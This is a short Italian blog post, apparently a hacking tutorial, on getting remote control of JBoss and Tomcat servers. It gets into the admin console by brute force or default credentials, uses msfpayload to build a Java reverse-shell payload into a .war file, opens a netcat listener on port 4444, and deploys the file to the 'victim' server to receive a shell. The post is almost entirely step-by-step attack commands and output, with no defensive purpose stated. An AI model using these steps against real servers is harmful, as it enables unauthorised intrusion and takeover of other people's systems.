22/05/13

JBoss and Tomcat Hacking

Una volta acceduti al pannello di controllo di JBoss (http://target:<port>/jmx-console) o Tomcat (http://target:<port>/manager/htrml), tramite bruteforce/credenziali di default, si dovra' creare una webshell ed eseguire il deploy.

Effettuare i seguenti passi:

1) cercare il payload adatto tramite msfupload e sceglierne uno idoneo: 
# msfpayload -l |grep java

2) verificare quali opzioni sono disponibili:
# msfpayload java/shell_reverse_tcp o (ad esempio)

3) creare un .war contenente il payload scelto: 
# msfpayload java/shell_reverse_tcp LHOST=ip_vostra_macchina LPORT=4444 W > poc.war

4) mettersi in listen sulla posta 4444 della propria macchina:
# nc -lvp 4444

listening on [any] 4444 ...


5) effettuare il deploy dell'applicazione file "poc.war" sul server vittima (Tomcat o JBoss)

6) eseguire il payload lanciando l'applicazione da browser

Se tutto e' andato a buon fine si otterra' una reverse shell sulla porta 4444 della propria macchina:

# nc -vvlp 4444
listening on [any] 4444 ...
connect to [X.X.X.X] from vittima [X.X.X.X] 52456




Nessun commento:

Posta un commento

Grazie per il commento.